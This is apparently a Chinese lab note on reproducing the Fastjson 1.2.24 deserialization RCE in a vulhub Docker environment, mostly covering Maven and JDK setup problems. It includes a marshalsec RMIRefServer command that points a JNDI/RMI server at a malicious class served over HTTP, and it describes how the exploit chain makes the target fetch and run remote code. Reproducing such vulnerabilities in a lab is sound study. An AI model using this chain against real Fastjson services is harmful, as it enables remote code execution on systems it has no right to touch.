Fastjson反序列化漏洞部署复现1.2.24版本反序列RCE笔记

环境部署

docker容器地址：https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.24-rce

启动docker环境 docker容器每次一启动就报错根据docker log [容器id] 查看报错日志发现有如下报错

library initialization failed - unable to allocate file descriptor table - out of memory

考虑是内存不够如下方式修改 docker 报错 library initialization failed - unable to allocate file descriptor table - out of memory-CSDN博客

我们在win10虚拟机裸机中安装java8-jdk8+maven3.9.6+marshalsec工具用于启动rmi服务器

maven环境变量总是创建不成功就去相应目录bin下cmd用mvn即可

mvn环境变量创建无效问题

解决办法：直接将绝对路径写到系统变量的path中移动到最上面记得系统调一下分辨率环境变量那里有个确定要点分辨率大了看不到没点自然没保存

接下来进入工具marshalsec目录下执行mvn命令

mvn clean package -DskipTests

又出现报错 No compiler xxxx

mvn clean报错

先记得把jdk下的bin目录加入到环境变量因为里面有javac

继续解决刚才红色的报错

最终解决参考：解决Maven错误No compiler is provided in this environment. Perhaps you are running on a JRE rather than a JDK? - 简书

总结：所有的java的jdk jre也好全都直接在path中设置绝对路径

maven jre jdk都是设置到bin目录

但是mvn clean package -DskipTests执行需要一个环境变量JAVA_HOME，且对应的地址是jdk文件夹，不带bin

处理完这两步也就解决了bug

在target文件夹

接下来我们创建恶意的java类

通过代码javac hacker.java

在kali中通过python启动http服务器将恶意类放到192.168.206.162的4444端口上

最终通过刚才的工具启动一个rmi服务器加载刚才设置的恶意类

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.206.162:4444/#hacker" 9999

开始监听9999端口的内容至此我们就开启了一个rmi服务器

kali中docker启动vulhub的fastjson1.2.24漏洞靶场环境 192.168.206.162 ip地址

通过bp抓包修改内容使用1.2.24的payload 我们的win10虚拟机是192.168.206.161

会先通过rmi请求到win10的rmi服务器

之后rmi服务器从kali的4444端口去取恶意类返回给rmi服务器 rmi服务器再返回给8090的fastjson执行

至此整个完整的利用链也就复现完毕了

Yakit设置的恶意类没办法成功执行命令

设置ip地址为可以访问到的通过http进行访问测试

恶意类反连成功但是执行不成功

原因如下：

由于我们是在本机中使用工具Yakit进行恶意类的生成并且生成jndi的服务器。但是我们是在kali的环境中，且是在docker环境下部署了fastjson的漏洞环境。所以这本身属于不出网的情况，因为没有相应的端口映射，可能是由于本机的安全问题导致的。所以会出现Yakit有显示jndi服务的连接，但是并不会成功执行shell的情况。所以一旦我们在另一台没有开启安全措施的windows机器中开启服务，不论是手动搭建jndi加载恶意类，还是启动Yakit工具，都可以成功利用。